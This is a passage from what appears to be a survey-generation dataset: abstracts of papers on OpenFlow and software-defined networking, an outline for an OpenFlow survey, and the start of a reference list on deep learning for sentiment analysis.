plane. This requires modifying switches and comes at the cost of visibility in the control plane. Taking an alternative route, we propose Kandoo, a framework for preserving scalability without changing switches. Kandoo has two layers of controllers: (i) the bottom layer is a group of controllers with no interconnection, and no knowledge of the network-wide state, and (ii) the top layer is a logically centralized controller that maintains the network-wide state. Controllers at the bottom layer run only local control applications (i.e., applications that can function using the state of a single switch) near datapaths. These controllers handle most of the frequent events and effectively shield the top layer. Kandoo's design enables network operators to replicate local controllers on demand and relieve the load on the top layer, which is the only potential bottleneck in terms of scalability. Our evaluations show that a network controlled by Kandoo has an order of magnitude lower control channel consumption compared to normal OpenFlow networks. --- paper_title: The controller placement problem paper_content: Network architectures such as Software-Defined Networks (SDNs) move the control logic off packet processing devices and onto external controllers. These network architectures with decoupled control planes open many unanswered questions regarding reliability, scalability, and performance when compared to more traditional purely distributed systems. This paper opens the investigation by focusing on two specific questions: given a topology, how many controllers are needed, and where should they go? To answer these questions, we examine fundamental limits to control plane propagation latency on an upcoming Internet2 production deployment, then expand our scope to over 100 publicly available WAN topologies. As expected, the answers depend on the topology. More surprisingly, one controller location is often sufficient to meet existing reaction-time requirements (though certainly not fault tolerance requirements). --- paper_title: Software defined networking: Meeting carrier grade requirements paper_content: Software Defined Networking is a networking paradigm which allows network operators to manage networking elements using software running on an external server. This is accomplished by a split in the architecture between the forwarding element and the control element. Two technologies which allow this split for packet networks are For CES and Openflow. We present energy efficiency and resilience aspects of carrier grade networks which can be met by Openflow. We implement flow restoration and run extensive experiments in an emulated carrier grade network. We show that Openflow can restore traffic quite fast, but its dependency on a centralized controller means that it will be hard to achieve 50 ms restoration in large networks serving many flows. In order to achieve 50 ms recovery, protection will be required in carrier grade networks. --- paper_title: On the Flexibility of MPLS Applications over an OpenFlow-Enabled Network paper_content: In today's networks, a node usually has a static role that cannot be easily changed without an expensive upgrade. In MPLS architecture, despite the flexible forwarding data plane not tied to a single forwarding technology, each MPLS node has to be dedicated for a specific role depending on its position in the edge or the core of the MPLS network domain. This paper proposes an approach to address the flexibility of an MPLS node to play multiple roles for different MPLS domains built on top of an underlying OpenFlow-enabled physical network. The pipelined approach through tables introduced in the version 1.1 and later of the OpenFlow specification allows the change of the packet processing behavior by just updating the memory structures -- such as the TCAM and hash tables. It exploits the power of the OpenFlow rules-based paradigm to demonstrate the high level programmability to achieve the deossification of an MPLS infrastructure. In order to validate our proposal, we have implemented our approach over a 100Gbps switch box built on network processors and tested it with three applications to evaluate its flexibility. The results show that the local software to hardware update of a Label Switched Path (LSP) can be made in 2.2ms, in average, and the deployment of a Label Switched Router (LSR) application with 400 labels takes only 392.5ms. --- paper_title: Source address validation solution with OpenFlow/NOX architecture paper_content: Current Internet is lack of validation on source IP address, resulting in many security threats. The future Internet can face the similar routing locator spoofing problem without careful design. The current in-progress source address validation standard, i.e., SAVI, is not of enough protection due to the solution space constraint. In this article, a mechanism named VAVE is proposed to improve the SAVI solutions. VAVE employs OpenFlow protocol, which provides the de facto standard network innovation interface, to solve source address validation problem with a global view. Significant improvements can be found from our evaluation results. --- paper_title: Unifying Packet and Circuit Switched Networks paper_content: There have been many attempts to unify the control and management of circuit and packet switched networks, but none have taken hold. In this paper we propose a simple way to unify both types of network using OpenFlow. The basic idea is that a simple flow abstraction fits well with both types of network, provides a common paradigm for control, and makes it easy to insert new functionality into the network. OpenFlow provides a common API to the underlying hardware, and allows all of the routing, control and management to be defined in software outside the datapath. --- paper_title: OMNI: OpenFlow MaNagement Infrastructure paper_content: Managing computer networks is challenging because of the numerous monitoring variables and the difficulty to autonomously configure network parameters. This paper presents the OpenFlow MaNagement Infrastructure (OMNI), which helps the administrator to control and manage OpenFlow networks by providing remote management based on a web interface. OMNI provides flow monitoring and dynamic flow configuration through a service-oriented architecture. OMNI also offers an Application Programming Interface (API) for collecting data and configuring the OpenFlow network. We propose a multi-agent system based on OMNI API that reduces packet loss rates. We evaluate both the OMNI management applications and the multi-agent system performance using a testbed. Our results show that the multi-agent system detects and reacts to a packet-loss condition in less than three monitoring intervals. --- paper_title: QuagFlow: partnering Quagga with OpenFlow paper_content: Computing history has shown that open, multi-layer hardware and software stacks encourage innovation and bring costs down. Only recently this trend is meeting the networking world with the availability of entire open source networking stacks being closer than ever. Towards this goal, we are working on QuagFlow, a transparent interplay between the popular Quagga open source routing suite and the low level vendor-independent OpenFlow interface. QuagFlow is a distributed system implemented as a NOX controller application and a series of slave daemons running along the virtual machines hosting the Quagga routing instances. --- paper_title: Ethane: taking control of the enterprise paper_content: This paper presents Ethane, a new network architecture for the enterprise. Ethane allows managers to define a single network-wide fine-grain policy, and then enforces it directly. Ethane couples extremely simple flow-based Ethernet switches with a centralized controller that manages the admittance and routing of flows. While radical, this design is backwards-compatible with existing hosts and switches. We have implemented Ethane in both hardware and software, supporting both wired and wireless hosts. Our operational Ethane network has supported over 300 hosts for the past four months in a large university network, and this deployment experience has significantly affected Ethane's design. --- paper_title: OpenFlow MPLS and the open source label switched router paper_content: Multiprotocol Label Switching (MPLS) [3] is a protocol widely used in commercial operator networks to forward packets by matching link-specific labels in the packet header to outgoing links rather than through standard IP longest prefix matching. However, in existing networks, MPLS is implemented by full IP routers, since the MPLS control plane protocols such as LDP [8] utilize IP routing to set up the label switched paths, even though the MPLS data plane does not require IP routing. OpenFlow 1.0 is an interface for controlling a routing or switching box by inserting flow specifications into the box's flow table [1]. While OpenFlow 1.0 does not support MPLS1, MPLS label-based forwarding seems conceptually a good match with OpenFlow's flow-based routing paradigm. In this paper we describe the design and implementation of an experimental extension of OpenFlow 1.0 to support MPLS. The extension allows an OpenFlow switch without IP routing capability to forward MPLS on the data plane. We also describe the implementation of a prototype open source MPLS label switched router, based on the NetFPGA hardware platform [4], utilizing OpenFlow MPLS. The prototype is capable of forwarding data plane packets at line speed without IP forwarding, though IP forwarding is still used on the control plane. We provide some performance measurements comparing the prototype to software routers. The measurements indicate that the prototype is an appropriate tool for achieving line speed forwarding in testbeds and other experimental networks where flexibility is a key attribute, as a substitute for software routers. --- paper_title: The controller placement problem paper_content: Network architectures such as Software-Defined Networks (SDNs) move the control logic off packet processing devices and onto external controllers. These network architectures with decoupled control planes open many unanswered questions regarding reliability, scalability, and performance when compared to more traditional purely distributed systems. This paper opens the investigation by focusing on two specific questions: given a topology, how many controllers are needed, and where should they go? To answer these questions, we examine fundamental limits to control plane propagation latency on an upcoming Internet2 production deployment, then expand our scope to over 100 publicly available WAN topologies. As expected, the answers depend on the topology. More surprisingly, one controller location is often sufficient to meet existing reaction-time requirements (though certainly not fault tolerance requirements). --- paper_title: Openflow-based server load balancing gone wild paper_content: Today's data centers host online services on multiple servers, with a front-end load balancer directing each client request to a particular replica. Dedicated load balancers are expensive and quickly become a single point of failure and congestion. The OpenFlow standard enables an alternative approach where the commodity network switches divide traffic over the server replicas, based on packet-handling rules installed by a separate controller. However, the simple approach of installing a separate rule for each client connection (or "microflow") leads to a huge number of rules in the switches and a heavy load on the controller. We argue that the controller should exploit switch support for wildcard rules for a more scalable solution that directs large aggregates of client traffic to server replicas. We present algorithms that compute concise wildcard rules that achieve a target distribution of the traffic, and automatically adjust to changes in load-balancing policies without disrupting existing connections. We implement these algorithms on top of the NOX OpenFlow controller, evaluate their effectiveness, and propose several avenues for further research. --- paper_title: Packet and circuit network convergence with OpenFlow paper_content: IP and Transport networks are controlled and operated independently today, leading to significant Capex and Opex inefficiencies for the providers. We discuss a unified approach with OpenFlow, and present a recent demonstration of a unified control plane for OpenFlow enabled IP/Ethernet and TDM switched networks. --- paper_title: Application-aware aggregation and traffic engineering in a converged packet-circuit network paper_content: We demonstrate a converged OpenFlow enabled packet-circuit network, where circuit flow properties (guarantee d bandwidth, low latency, low jitter, bandwidth-on-demand, fast recovery) provide differential treatment to dynamically aggregated packet flows for voice, video and web traffic. --- paper_title: MPLS with a simple OPEN control plane paper_content: We propose a new approach to MPLS that uses the standard MPLS data plane and an OpenFlow based simpler and extensible control plane. We demonstrate this approach using a prototype system for MPLS Traffic Engineering. --- paper_title: Towards software-friendly networks paper_content: There has usually been a clean separation between networks and the applications that use them. Applications send packets over a simple socket API; the network delivers them. However, there are many occasions when applications can benefit from more direct interaction with the network: to observe more of the current network state and to obtain more control over the network behavior. This paper explores some of the potential benefits of closer interaction between applications and the network. Exploiting the emergence of so-called "software-defined networks" (SDN) built above network-wide control planes, we explore how to build a more "software-friendly network". We present results from a preliminary exploration that aims to provide network services to applications via an explicit communication channel. --- paper_title: A network in a laptop: rapid prototyping for software-defined networks paper_content: Mininet is a system for rapidly prototyping large networks on the constrained resources of a single laptop. The lightweight approach of using OS-level virtualization features, including processes and network namespaces, allows it to scale to hundreds of nodes. Experiences with our initial implementation suggest that the ability to run, poke, and debug in real time represents a qualitative change in workflow. We share supporting case studies culled from over 100 users, at 18 institutions, who have developed Software-Defined Networks (SDN). Ultimately, we think the greatest value of Mininet will be supporting collaborative network research, by enabling self-contained SDN prototypes which anyone with a PC can download, run, evaluate, explore, tweak, and build upon. --- paper_title: Enabling the future optical Internet with OpenFlow: A paradigm shift in providing intelligent optical network services paper_content: This paper proposes an optical networking paradigm suitable for future Internet services enabled by OpenFlow. The OpenFlow technology supports the programmability of network functions and protocols by separating the data plane and the control plane, which are currently vertically integrated in routers and switches. OpenFlow facilitates fundamental changes in the behaviour of networks and their associated protocols. This paper introduces an OpenFlow optical network architecture enabled by optical flow, optical flow switching elements and programmable OpenFlow controllers. The proposed solution allows intelligent, user controlled and programmable optical network service provisioning with the capability to operate any user defined network protocol and scenario. --- paper_title: MPLS-TE and MPLS VPNS with openflow paper_content: We demonstrate MPLS Traffic Engineering (MPLS-TE) and MPLS-based Virtual Private Networks (MPLS VPNs) using OpenFlow [1] and NOX [6]. The demonstration is the outcome of an engineering experiment to answer the following questions: How hard is it to implement a complex control plane on top of a network controller such as NOX? Does the global vantage point in NOX make the implementation easier than the traditional method of implementing it on every switch, embedded in the data plane? We implemented every major feature of MPLS-TE and MPLS-VPN in just 2,000 lines of code, compared to much larger lines of code in the more traditional approach, such as Quagga-MPLS. Because NOX maintains a consistent, up-to-date topology map, the MPLS control plane features are quite simple to implement. And its simplicity makes it easy to extend: We have easily added several new features; something a network operator could do to customize their network to meet their customers' needs. ::: The demo consists of two parts: MPLS-TE services and then MPLS VPN driven by a GUI. ---
Title: Network Innovation using OpenFlow: A Survey Section 1: INTRODUCTION Description 1: Introduce the concept of Software Defined Networking (SDN) and OpenFlow, articulating the motivations and outlining the objectives of the paper. Section 2: BACKGROUND OF PROGRAMMABLE NETWORKS Description 2: Present an overview of early approaches to programmable networks and the transition to SDN, highlighting softnet, Active Networks, and the ForCES standard. Section 3: OPENFLOW SPECIFICATION Description 3: Detail the technical specifications of different versions of OpenFlow, discussing the architecture, components, operations, and how applications can be implemented. Section 4: CAPABILITIES OF OPENFLOW Description 4: Discuss the inherent capabilities of OpenFlow networks, including centralized control, software-based traffic analysis, dynamic rule updating, and flow abstraction, with practical examples. Section 5: OPENFLOW-BASED APPLICATIONS Description 5: Survey various applications of OpenFlow in networking, focusing on ease of configuration, network management, security, availability, network virtualization, and wide area and wireless network applications. Section 6: OPENFLOW DEPLOYMENTS Description 6: Highlight different real-world deployments of OpenFlow in campus networks, research testbeds, and large-scale industry deployments, with specific examples such as the GENI infrastructure. Section 7: PERFORMANCE OF OPENFLOW-BASED NETWORKS Description 7: Review studies that have evaluated the performance of OpenFlow-based networks, including measurements, modeling, and suggestions for improving performance. Section 8: CHALLENGES OF OPENFLOW-BASED NETWORKS Description 8: Identify and discuss the various challenges faced by OpenFlow-based networks, such as security, availability, scalability, reliability, expenditure, and compatibility. Section 9: CONCLUSIONS AND FUTURE DIRECTIONS Description 9: Summarize the findings of the paper and propose future research directions in the study and application of OpenFlow-based networks. Section 10: ACKNOWLEDGMENT Description 10: Acknowledge the contributions of individuals and organizations that supported the research or provided feedback on the manuscript.
Deep Learning for Sentiment Analysis : A Survey
25
--- paper_title: Deep Sparse Rectifier Neural Networks paper_content: While logistic sigmoid neurons are more biologically plausible than hyperbolic tangent neurons, the latter work better for training multi-layer neural networks. This paper shows that rectifying neurons are an even better model of biological neurons and yield equal or better performance than hyperbolic tangent networks in spite of the hard non-linearity and non-dierentiabil ity --- paper_title: Sentiment Analysis: Mining Opinions, Sentiments, and Emotions paper_content: 1. Introduction 2. The problem of sentiment analysis 3. Document sentiment classification 4. Sentence subjectivity and sentiment classification 5. Aspect sentiment classification 6. Aspect and entity extraction 7. Sentiment lexicon generation 8. Analysis of comparative opinions 9. Opinion summarization and search 10. Analysis of debates and comments 11. Mining intentions 12. Detecting fake or deceptive opinions 13. Quality of reviews. --- paper_title: Representation Learning: A Review and New Perspectives paper_content: The success of machine learning algorithms generally depends on data representation, and we hypothesize that this is because different representations can entangle and hide more or less the different explanatory factors of variation behind the data. Although specific domain knowledge can be used to help design representations, learning with generic priors can also be used, and the quest for AI is motivating the design of more powerful representation-learning algorithms implementing such priors. This paper reviews recent work in the area of unsupervised feature learning and deep learning, covering advances in probabilistic models, autoencoders, manifold learning, and deep networks. This motivates longer term unanswered questions about the appropriate objectives for learning good representations, for computing representations (i.e., inference), and the geometrical connections between representation learning, density estimation, and manifold learning. --- paper_title: Convolutional deep belief networks for scalable unsupervised learning of hierarchical representations paper_content: There has been much interest in unsupervised learning of hierarchical generative models such as deep belief networks. Scaling such models to full-sized, high-dimensional images remains a difficult problem. To address this problem, we present the convolutional deep belief network, a hierarchical generative model which scales to realistic image sizes. This model is translation-invariant and supports efficient bottom-up and top-down probabilistic inference. Key to our approach is probabilistic max-pooling, a novel technique which shrinks the representations of higher layers in a probabilistically sound way. Our experiments show that the algorithm learns useful high-level visual features, such as object parts, from unlabeled images of objects and natural scenes. We demonstrate excellent performance on several visual recognition tasks and show that our model can perform hierarchical (bottom-up and top-down) inference over full-sized images. --- paper_title: Natural Language Processing (almost) from Scratch paper_content: We propose a unified neural network architecture and learning algorithm that can be applied to various natural language processing tasks including part-of-speech tagging, chunking, named entity recognition, and semantic role labeling. This versatility is achieved by trying to avoid task-specific engineering and therefore disregarding a lot of prior knowledge. Instead of exploiting man-made input features carefully optimized for each task, our system learns internal representations on the basis of vast amounts of mostly unlabeled training data. This work is then used as a basis for building a freely available tagging system with good performance and minimal computational requirements. --- paper_title: Glove: Global Vectors for Word Representation paper_content: Recent methods for learning vector space representations of words have succeeded in capturing fine-grained semantic and syntactic regularities using vector arithmetic, but the origin of these regularities has remained opaque. We analyze and make explicit the model properties needed for such regularities to emerge in word vectors. The result is a new global logbilinear regression model that combines the advantages of the two major model families in the literature: global matrix factorization and local context window methods. Our model efficiently leverages statistical information by training only on the nonzero elements in a word-word cooccurrence matrix, rather than on the entire sparse matrix or on individual context windows in a large corpus. The model produces a vector space with meaningful substructure, as evidenced by its performance of 75% on a recent word analogy task. It also outperforms related models on similarity tasks and named entity recognition. --- paper_title: Improving Word Representations via Global Context and Multiple Word Prototypes paper_content: Unsupervised word representations are very useful in NLP tasks both as inputs to learning algorithms and as extra word features in NLP systems. However, most of these models are built with only local context and one representation per word. This is problematic because words are often polysemous and global context can also provide useful information for learning word meanings. We present a new neural network architecture which 1) learns word embeddings that better capture the semantics of words by incorporating both local and global document context, and 2) accounts for homonymy and polysemy by learning multiple embeddings per word. We introduce a new dataset with human judgments on pairs of words in sentential context, and evaluate our model on it, showing that our model outperforms competitive baselines and other neural language models. --- paper_title: A Neural Probabilistic Language Model paper_content: A goal of statistical language modeling is to learn the joint probability function of sequences of words in a language. This is intrinsically difficult because of the curse of dimensionality: a word sequence on which the model will be tested is likely to be different from all the word sequences seen during training. Traditional but very successful approaches based on n-grams obtain generalization by concatenating very short overlapping sequences seen in the training set. We propose to fight the curse of dimensionality by learning a distributed representation for words which allows each training sentence to inform the model about an exponential number of semantically neighboring sentences. The model learns simultaneously (1) a distributed representation for each word along with (2) the probability function for word sequences, expressed in terms of these representations. Generalization is obtained because a sequence of words that has never been seen before gets high probability if it is made of words that are similar (in the sense of having a nearby representation) to words forming an already seen sentence. Training such large models (with millions of parameters) within a reasonable time is itself a significant challenge. We report on experiments using neural networks for the probability function, showing on two text corpora that the proposed approach significantly improves on state-of-the-art n-gram models, and that the proposed approach allows to take advantage of longer contexts. --- paper_title: Distributed Representations of Words and Phrases and their Compositionality paper_content: The recently introduced continuous Skip-gram model is an efficient method for learning high-quality distributed vector representations that capture a large number of precise syntactic and semantic word relationships. In this paper we present several extensions that improve both the quality of the vectors and the training speed. By subsampling of the frequent words we obtain significant speedup and also learn more regular word representations. We also describe a simple alternative to the hierarchical softmax called negative sampling. ::: ::: An inherent limitation of word representations is their indifference to word order and their inability to represent idiomatic phrases. For example, the meanings of "Canada" and "Air" cannot be easily combined to obtain "Air Canada". Motivated by this example, we present a simple method for finding phrases in text, and show that learning good vector representations for millions of phrases is possible. --- paper_title: Learning word embeddings efficiently with noise-contrastive estimation paper_content: Continuous-valued word embeddings learned by neural language models have recently been shown to capture semantic and syntactic information about words very well, setting performance records on several word similarity tasks. The best results are obtained by learning high-dimensional embeddings from very large quantities of data, which makes scalability of the training method a critical factor. ::: ::: We propose a simple and scalable new approach to learning word embeddings based on training log-bilinear models with noise-contrastive estimation. Our approach is simpler, faster, and produces better results than the current state-of-the-art method. We achieve results comparable to the best ones reported, which were obtained on a cluster, using four times less data and more than an order of magnitude less computing time. We also investigate several model types and find that the embeddings learned by the simpler models perform at least as well as those learned by the more complex ones. --- paper_title: Hierarchical Probabilistic Neural Network Language Model paper_content: In recent years, variants of a neural network architecture for statistical language modeling have been proposed and successfully applied, e.g. in the language modeling component of speech recognizers. The main advantage of these architectures is that they learn an embedding for words (or other symbols) in a continuous space that helps to smooth the language model and provide good generalization even when the number of training examples is insufficient. However, these models are extremely slow in comparison to the more commonly used n-gram models, both for training and recognition. As an alternative to an importance sampling method proposed to speed-up training, we introduce a hierarchical decomposition of the conditional probabilities that yields a speed-up of about 200 both during training and recognition. The hierarchical decomposition is a binary hierarchical clustering constrained by the prior knowledge extracted from the WordNet semantic hierarchy. --- paper_title: Efficient Estimation of Word Representations in Vector Space paper_content: We propose two novel model architectures for computing continuous vector representations of words from very large data sets. The quality of these representations is measured in a word similarity task, and the results are compared to the previously best performing techniques based on different types of neural networks. We observe large improvements in accuracy at much lower computational cost, i.e. it takes less than a day to learn high quality word vectors from a 1.6 billion words data set. Furthermore, we show that these vectors provide state-of-the-art performance on our test set for measuring syntactic and semantic word similarities. --- paper_title: Natural Language Processing (almost) from Scratch paper_content: We propose a unified neural network architecture and learning algorithm that can be applied to various natural language processing tasks including part-of-speech tagging, chunking, named entity recognition, and semantic role labeling. This versatility is achieved by trying to avoid task-specific engineering and therefore disregarding a lot of prior knowledge. Instead of exploiting man-made input features carefully optimized for each task, our system learns internal representations on the basis of vast amounts of mostly unlabeled training data. This work is then used as a basis for building a freely available tagging system with good performance and minimal computational requirements. --- paper_title: Reducing the Dimensionality of Data with Neural Networks paper_content: High-dimensional data can be converted to low-dimensional codes by training a multilayer neural network with a small central layer to reconstruct high-dimensional input vectors. Gradient descent can be used for fine-tuning the weights in such “autoencoder” networks, but this works well only if the initial weights are close to a good solution. We describe an effective way of initializing the weights that allows deep autoencoder networks to learn low-dimensional codes that work much better than principal components analysis as a tool to reduce the dimensionality of data. --- paper_title: Greedy layer-wise training of deep networks paper_content: Complexity theory of circuits strongly suggests that deep architectures can be much more efficient (sometimes exponentially) than shallow architectures, in terms of computational elements required to represent some functions. Deep multi-layer neural networks have many levels of non-linearities allowing them to compactly represent highly non-linear and highly-varying functions. However, until recently it was not clear how to train such deep networks, since gradient-based optimization starting from random initialization appears to often get stuck in poor solutions. Hinton et al. recently introduced a greedy layer-wise unsupervised learning algorithm for Deep Belief Networks (DBN), a generative model with many layers of hidden causal variables. In the context of the above optimization problem, we study this algorithm empirically and explore variants to better understand its success and extend it to cases where the inputs are continuous or where the structure of the input distribution is not revealing enough about the variable to be predicted in a supervised task. Our experiments also confirm the hypothesis that the greedy layer-wise unsupervised training strategy mostly helps the optimization, by initializing weights in a region near a good local minimum, giving rise to internal distributed representations that are high-level abstractions of the input, bringing better generalization. --- paper_title: Extracting and composing robust features with denoising autoencoders paper_content: Previous work has shown that the difficulties in learning deep generative or discriminative models can be overcome by an initial unsupervised learning step that maps inputs to useful intermediate representations. We introduce and motivate a new training principle for unsupervised learning of a representation based on the idea of making the learned representations robust to partial corruption of the input pattern. This approach can be used to train autoencoders, and these denoising autoencoders can be stacked to initialize deep architectures. The algorithm can be motivated from a manifold learning and information theoretic perspective or from a generative model perspective. Comparative experiments clearly show the surprising advantage of corrupting the input of autoencoders on a pattern classification benchmark suite. --- paper_title: Traffic sign recognition with multi-scale Convolutional Networks paper_content: We apply Convolutional Networks (ConvNets) to the task of traffic sign classification as part of the GTSRB competition. ConvNets are biologically-inspired multi-stage architectures that automatically learn hierarchies of invariant features. While many popular vision approaches use hand-crafted features such as HOG or SIFT, ConvNets learn features at every level from data that are tuned to the task at hand. The traditional ConvNet architecture was modified by feeding 1st stage features in addition to 2nd stage features to the classifier. The system yielded the 2nd-best accuracy of 98.97% during phase I of the competition (the best entry obtained 98.98%), above the human performance of 98.81%, using 32×32 color input images. Experiments conducted after phase 1 produced a new record of 99.17% by increasing the network capacity, and by using greyscale images instead of color. Interestingly, random features still yielded competitive results (97.33%). --- paper_title: Finding Structure in Time paper_content: Time underlies many interesting human behaviors. Thus, the question of how to represent time in connectionist models is very important. One approach is to represent time implicitly by its effects on processing rather than explicitly (as in a spatial representation). The current report develops a proposal along these lines first described by Jordan (1986) which involves the use of recurrent links in order to provide networks with a dynamic memory. In this approach, hidden unit patterns are fed back to themselves; the internal representations which develop thus reflect task demands in the context of prior internal states. A set of simulations is reported which range from relatively simple problems (temporal version of XOR) to discovering syntactic/semantic features for words. The networks are able to learn interesting internal representations which incorporate task demands with memory demands; indeed, in this approach the notion of memory is inextricably bound up with task processing. These representations reveal a rich structure, which allows them to be highly context-dependent while also expressing generalizations across classes of items. These representations suggest a method for representing lexical categories and the type/token distinction. --- paper_title: Bidirectional recurrent neural networks paper_content: In the first part of this paper, a regular recurrent neural network (RNN) is extended to a bidirectional recurrent neural network (BRNN). The BRNN can be trained without the limitation of using input information just up to a preset future frame. This is accomplished by training it simultaneously in positive and negative time direction. Structure and training procedure of the proposed network are explained. In regression and classification experiments on artificial data, the proposed structure gives better results than other approaches. For real data, classification experiments for phonemes from the TIMIT database show the same tendency. In the second part of this paper, it is shown how the proposed bidirectional structure can be easily modified to allow efficient estimation of the conditional posterior probability of complete symbol sequences without making any explicit assumption about the shape of the distribution. For this part, experiments on real data are reported. --- paper_title: Improved Semantic Representations From Tree-Structured Long Short-Term Memory Networks paper_content: Because of their superior ability to preserve sequence information over time, Long Short-Term Memory (LSTM) networks, a type of recurrent neural network with a more complex computational unit, have obtained strong results on a variety of sequence modeling tasks. The only underlying LSTM structure that has been explored so far is a linear chain. However, natural language exhibits syntactic properties that would naturally combine words to phrases. We introduce the Tree-LSTM, a generalization of LSTMs to tree-structured network topologies. Tree-LSTMs outperform all existing systems and strong LSTM baselines on two tasks: predicting the semantic relatedness of two sentences (SemEval 2014, Task 1) and sentiment classification (Stanford Sentiment Treebank). --- paper_title: Learning Phrase Representations using RNN Encoder-Decoder for Statistical Machine Translation paper_content: In this paper, we propose a novel neural network model called RNN Encoder‐ Decoder that consists of two recurrent neural networks (RNN). One RNN encodes a sequence of symbols into a fixedlength vector representation, and the other decodes the representation into another sequence of symbols. The encoder and decoder of the proposed model are jointly trained to maximize the conditional probability of a target sequence given a source sequence. The performance of a statistical machine translation system is empirically found to improve by using the conditional probabilities of phrase pairs computed by the RNN Encoder‐Decoder as an additional feature in the existing log-linear model. Qualitatively, we show that the proposed model learns a semantically and syntactically meaningful representation of linguistic phrases. --- paper_title: Empirical Evaluation of Gated Recurrent Neural Networks on Sequence Modeling paper_content: In this paper we compare different types of recurrent units in recurrent neural networks (RNNs). Especially, we focus on more sophisticated units that implement a gating mechanism, such as a long short-term memory (LSTM) unit and a recently proposed gated recurrent unit (GRU). We evaluate these recurrent units on the tasks of polyphonic music modeling and speech signal modeling. Our experiments revealed that these advanced recurrent units are indeed better than more traditional recurrent units such as tanh units. Also, we found GRU to be comparable to LSTM. --- paper_title: Hierarchical Probabilistic Neural Network Language Model paper_content: In recent years, variants of a neural network architecture for statistical language modeling have been proposed and successfully applied, e.g. in the language modeling component of speech recognizers. The main advantage of these architectures is that they learn an embedding for words (or other symbols) in a continuous space that helps to smooth the language model and provide good generalization even when the number of training examples is insufficient. However, these models are extremely slow in comparison to the more commonly used n-gram models, both for training and recognition. As an alternative to an importance sampling method proposed to speed-up training, we introduce a hierarchical decomposition of the conditional probabilities that yields a speed-up of about 200 both during training and recognition. The hierarchical decomposition is a binary hierarchical clustering constrained by the prior knowledge extracted from the WordNet semantic hierarchy. --- paper_title: Convolutional deep belief networks for scalable unsupervised learning of hierarchical representations paper_content: There has been much interest in unsupervised learning of hierarchical generative models such as deep belief networks. Scaling such models to full-sized, high-dimensional images remains a difficult problem. To address this problem, we present the convolutional deep belief network, a hierarchical generative model which scales to realistic image sizes. This model is translation-invariant and supports efficient bottom-up and top-down probabilistic inference. Key to our approach is probabilistic max-pooling, a novel technique which shrinks the representations of higher layers in a probabilistically sound way. Our experiments show that the algorithm learns useful high-level visual features, such as object parts, from unlabeled images of objects and natural scenes. We demonstrate excellent performance on several visual recognition tasks and show that our model can perform hierarchical (bottom-up and top-down) inference over full-sized images. --- paper_title: Neural Machine Translation by Jointly Learning to Align and Translate paper_content: Neural machine translation is a recently proposed approach to machine translation. Unlike the traditional statistical machine translation, the neural machine translation aims at building a single neural network that can be jointly tuned to maximize the translation performance. The models proposed recently for neural machine translation often belong to a family of encoder-decoders and consists of an encoder that encodes a source sentence into a fixed-length vector from which a decoder generates a translation. In this paper, we conjecture that the use of a fixed-length vector is a bottleneck in improving the performance of this basic encoder-decoder architecture, and propose to extend this by allowing a model to automatically (soft-)search for parts of a source sentence that are relevant to predicting a target word, without having to form these parts as a hard segment explicitly. With this new approach, we achieve a translation performance comparable to the existing state-of-the-art phrase-based system on the task of English-to-French translation. Furthermore, qualitative analysis reveals that the (soft-)alignments found by the model agree well with our intuition. --- paper_title: Distributed Representations of Sentences and Documents paper_content: Many machine learning algorithms require the input to be represented as a fixed-length feature vector. When it comes to texts, one of the most common fixed-length features is bag-of-words. Despite their popularity, bag-of-words features have two major weaknesses: they lose the ordering of the words and they also ignore semantics of the words. For example, "powerful," "strong" and "Paris" are equally distant. In this paper, we propose Paragraph Vector, an unsupervised algorithm that learns fixed-length feature representations from variable-length pieces of texts, such as sentences, paragraphs, and documents. Our algorithm represents each document by a dense vector which is trained to predict words in the document. Its construction gives our algorithm the potential to overcome the weaknesses of bag-of-words models. Empirical results show that Paragraph Vectors outperforms bag-of-words models as well as other techniques for text representations. Finally, we achieve new state-of-the-art results on several text classification and sentiment analysis tasks. --- paper_title: Document Modeling with Gated Recurrent Neural Network for Sentiment Classification paper_content: Document level sentiment classification remains a challenge: encoding the intrinsic relations between sentences in the semantic meaning of a document. To address this, we introduce a neural network model to learn vector-based document representation in a unified, bottom-up fashion. The model first learns sentence representation with convolutional neural network or long short-term memory. Afterwards, semantics of sentences and their relations are adaptively encoded in document representation with gated recurrent neural network. We conduct document level sentiment classification on four large-scale review datasets from IMDB and Yelp Dataset Challenge. Experimental results show that: (1) our neural model shows superior performances over several state-of-the-art algorithms; (2) gated recurrent neural network dramatically outperforms standard recurrent neural network in document modeling for sentiment classification. 1 --- paper_title: Effective Use of Word Order for Text Categorization with Convolutional Neural Networks paper_content: Convolutional neural network (CNN) is a neural network that can make use of the internal structure of data such as the 2D structure of image data. This paper studies CNN on text categorization to exploit the 1D structure (namely, word order) of text data for accurate prediction. Instead of using low-dimensional word vectors as input as is often done, we directly apply CNN to high-dimensional text data, which leads to directly learning embedding of small text regions for use in classification. In addition to a straightforward adaptation of CNN from image to text, a simple but new variation which employs bag-of-word conversion in the convolution layer is proposed. An extension to combine multiple convolution layers is also explored for higher accuracy. The experiments demonstrate the effectiveness of our approach in comparison with state-of-the-art methods. --- paper_title: Domain Adaptation for Large-Scale Sentiment Classification: A Deep Learning Approach paper_content: The exponential increase in the availability of online reviews and recommendations makes sentiment classification an interesting topic in academic and industrial research. Reviews can span so many different domains that it is difficult to gather annotated training data for all of them. Hence, this paper studies the problem of domain adaptation for sentiment classifiers, hereby a system is trained on labeled reviews from one source domain but is meant to be deployed on another. We propose a deep learning approach which learns to extract a meaningful representation for each review in an unsupervised fashion. Sentiment classifiers trained with this high-level feature representation clearly outperform state-of-the-art methods on a benchmark composed of reviews of 4 types of Amazon products. Furthermore, this method scales well and allowed us to successfully perform domain adaptation on a larger industrial-strength dataset of 22 domains. --- paper_title: Learning Semantic Representations of Users and Products for Document Level Sentiment Classification paper_content: Neural network methods have achieved promising results for sentiment classification of text. However, these models only use semantics of texts, while ignoring users who express the sentiment and products which are evaluated, both of which have great influences on interpreting the sentiment of text. In this paper, we address this issue by incorporating userand productlevel information into a neural network approach for document level sentiment classification. Users and products are modeled using vector space models, the representations of which capture important global clues such as individual preferences of users or overall qualities of products. Such global evidence in turn facilitates embedding learning procedure at document level, yielding better text representations. By combining evidence at user-, productand documentlevel in a unified neural framework, the proposed model achieves state-of-the-art performances on IMDB and Yelp datasets1. --- paper_title: End-to-end adversarial memory network for cross-domain sentiment classification paper_content: Domain adaptation tasks such as cross-domain sentiment classification have raised much attention in recent years. Due to the domain discrepancy, a sentiment classifier trained in a source domain may not work well when directly applied to a target domain. Traditional methods need to manually select pivots, which behave in the same way for discriminative learning in both domains. Recently, deep learning methods have been proposed to learn a representation shared by domains. However, they lack the interpretability to directly identify the pivots. To address the problem, we 